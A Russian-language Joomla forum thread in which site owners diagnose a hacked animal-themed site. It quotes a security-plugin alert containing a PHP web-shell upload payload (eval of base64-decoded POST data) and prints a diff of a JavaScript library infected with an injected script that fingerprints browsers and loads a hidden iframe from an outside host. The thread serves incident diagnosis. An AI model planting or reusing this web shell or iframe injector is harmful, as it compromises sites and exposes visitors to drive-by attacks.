Joomla 4. Компонент K2 и форк K2ForJ4 (18 янв 2024)

Если вас, как и меня, достало выслушивать (вычитывать) бесконечные обещания разработчика K2 опубликовать версию компонента K2 под Joomla 4 (без чего невозможно реализовать апгрейд from Joomla 3 to Joomla 4) - воспользуйтесь форком K2ForJ4. Который в данный момент установлен и без каких-либо проблем работает на этом веб-сайте.

Сайт про животных

Больше
10 года 10 мес. назад - 10 года 10 мес. назад #21 от Unior82
Unior82 ответил в теме Re: Сайт про животных

Arhitektorius пишет: System - Marco's SQL Injection постоянно верещит!


Здравствуйте. Это ни о чем не говорит. Marco's SQL Injection так и будет верещать по поводу и без повода, он так работает. Вообще не знаю ни одного даже профессионального софта по этой теме, который исправно работает. Может кто просветит? Помню когда-то (было это на Sweb) очень долго пытался опубликовать на джумла-сайте техническую статтью, и это не получалось, джумла выдавала ошибку. Решить траблу удалось лишь обращением в сапорт, они отключили какую-то свою защиту на хостинге, и текст (в котором встречалось слово SQL или MySQL, не помню точно) наконец удалось опубликовать на сайте.
Последнее редактирование: 10 года 10 мес. назад пользователем Unior82.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Dev banner 2
Больше
10 года 10 мес. назад #22 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных

Это ни о чем не говорит. Marco's SQL Injection так и будет верещать по поводу и без повода

Позвольте не согласиться! Вот сегодня, например Инспектор мне прислал такое
Code:
*$_POST DUMP -[path] => ../../../images/pst.php -[raw_data] => <?php eval (base64_decode($_POST["php"])); ?>
Кто-то на ушко мне шепчет, что это как раз был повод ;)

PS Нашел в папке images "заразные" файлы, но именно pst.php там не было!

Моё хобби стало моей проффесией ;)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 10 мес. назад #23 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: Вот сегодня, например Инспектор мне прислал такое...

Нашел в папке images "заразные" файлы, но именно pst.php там не было!


Ну, Marco's SQL Injection нередко присылает инфу, один-в-один похожую на эту... достаточно посмотреть в гугле,чтобы убедиться. Но откуда у тебя взялись заразные файлы на сайте то? да еще в папке images ? Судя по тому, что сайт все еще в оффлайне - что-то серьезное там у тебя? Будет очень интересно, если сумеешь выявить, через какое такое левое extension тебя взломали.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад - 10 года 9 мес. назад #24 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Вчера перелил сайт к себе на Бубунту, чтобы проще ковырять было и...
Увидел нижеописанное. Честно, я вообще не понимаю как такое может быть!!! :blink: Кто может сталкивался с таким?
Итак, вот скрин





На скрине слева подключение по фтп к моей убунте (вчерашняя копия сайта), а справа подключение к хостеру, где лежит оригинал файла откуда вчера его копировал. Пониже открытые в редакторе файлы (с каждой стороны соответственно) Файлы разные! В копии я отчетливо вижу "вредоносный код", в оригинале же всё якобы чисто! :blink:
Как такое могло получиться?
PS Кто повнимательнее скажут, дата записи файла 03.07.13. На самом деле я просто его переименовывал... После отката файла на хостинге к вчера, позавчера, сегодня все остается точно также, только дата записи файла меняется на 18.11.12. Кароч давно там лежит, только откуда взялся непонятно... Повторюсь, никаких расширений и т.п. уже год как не ставил (кроме как рукописного снега на JS...)

Моё хобби стало моей проффесией ;)
Последнее редактирование: 10 года 9 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #25 от Aleksej
Aleksej ответил в теме Re: Сайт про животных
Не вполне понимаю, зачем тебе вообще эта либа, в joomla 2.5 по умолчанию нет такого каталога. Откуда оно у тебя на сайте и зачем? Если не знаешь - удали (в бэкап) и посмотри что получится.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад - 10 года 9 мес. назад #26 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Я и сам уже не понимаю )) Ковыряю из интереса... А жумла у меня ваще полторашная тут!
Стоит плагин XAJAX System Mambot For Joomla 1.5 для чего-то видимо ставил, не спроста же!

А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!

Моё хобби стало моей проффесией ;)
Последнее редактирование: 10 года 9 мес. назад пользователем Arhitektorius.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #27 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!


Гы, натуралист юный. Парк юрского периода на сайте разводишь? сайт про животных и с животными, многочисленными и спонтанно саморазмножающимися...
Давай для начала вывод диффа в студию, что ли. В плане этих самых разных файлов с одинаковыми именами, коли уж на бубунте. А там посмотрим.

Code:
diff file1 file2

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
10 года 9 мес. назад #28 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Разница в файлах как раз - код зверя
Code:
1,41c1 < //2178hepalo < (function(){ < function stripos (f_haystack, f_needle, f_offset) { < var haystack = (f_haystack + '').toLowerCase(); < var needle = (f_needle + '').toLowerCase(); < var index = 0; < if ((index = haystack.indexOf(needle, f_offset)) !== -1) { < return index; < } < return false; < } < function zzz_check_ua(){ < var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0'; < blackList = blackList.split('|'); < < var blackUA = false; < for (var i in blackList) { < if (stripos(navigator.userAgent, blackList[i])!==false) { < blackUA = true; < break; < } < } < return blackUA; < } < function setCookie(name, value, expires) { < var date = new Date( new Date().getTime() + expires*1000 ); < document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); < } < function getCookie(name) { < var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); < return matches ? decodeURIComponent(matches[1]) : undefined; < } < if (!zzz_check_ua()) { < var cookie = getCookie('ecalu1784b19'); < if (cookie == undefined) { < setCookie('ecalu1784b19', true, 86400); < document.write('<iframe src="http://braintube.ru/inspired.took?default" style="position:absolute;left:-1000px;top:-1000px;" height="112" width="112"></iframe>'); < } < }; < })(); < //caaba91838f8/* xajax Javascript library :: version 0.2.5 */ --- > /* xajax Javascript library :: version 0.2.5 */

Моё хобби стало моей проффесией ;)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Работает на Kunena форум